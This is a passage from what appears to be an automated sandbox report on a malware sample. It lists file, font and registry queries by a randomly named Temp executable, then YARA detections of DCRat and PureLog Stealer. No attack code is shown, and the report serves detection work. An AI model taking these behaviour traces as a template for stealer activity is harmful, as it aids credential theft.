                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exeQueries volume information: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe VolumeInformation
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00E4DF1E
                                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E3B146 GetVersionExW,0_2_00E3B146
                                  Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                  Stealing of Sensitive Information

                                  barindex
                                  Yara detected DCRat
                                  Source: Yara matchFile source: 0000000E.00000002.2910935301.0000000003B02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000E.00000002.2910935301.000000000384A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000004.00000002.1801521334.0000000012BCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000E.00000002.2910935301.0000000003529000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: chainportruntimeCrtMonitor.exe PID: 7876, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: kahKUDRlEYHfKIalWlM.exe PID: 7244, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: kahKUDRlEYHfKIalWlM.exe PID: 7264, type: MEMORYSTR
                                  Yara detected PureLog Stealer
                                  Source: Yara matchFile source: file.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.3.file.exe.69276f8.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.file.exe.52886f8.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.file.exe.52886f8.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 4.0.chainportruntimeCrtMonitor.exe.570000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.3.file.exe.69276f8.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000003.1644868327.000000000523A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
